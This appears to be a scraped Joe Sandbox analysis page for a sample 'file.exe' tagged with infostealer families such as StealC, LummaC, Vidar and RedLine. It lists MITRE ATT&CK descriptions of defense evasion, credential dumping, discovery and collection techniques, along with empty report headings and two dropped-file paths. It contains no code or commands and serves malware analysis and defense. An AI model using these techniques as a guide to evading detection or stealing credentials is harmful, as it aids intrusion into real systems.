Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Threatname: Amadey

Threatname: RedLine

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BAAEHDBFIDAFIDHJEBFBGDGHJD

C:\ProgramData\ECGDBAEHIJKKFHIEGCBGCAFIJJ

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre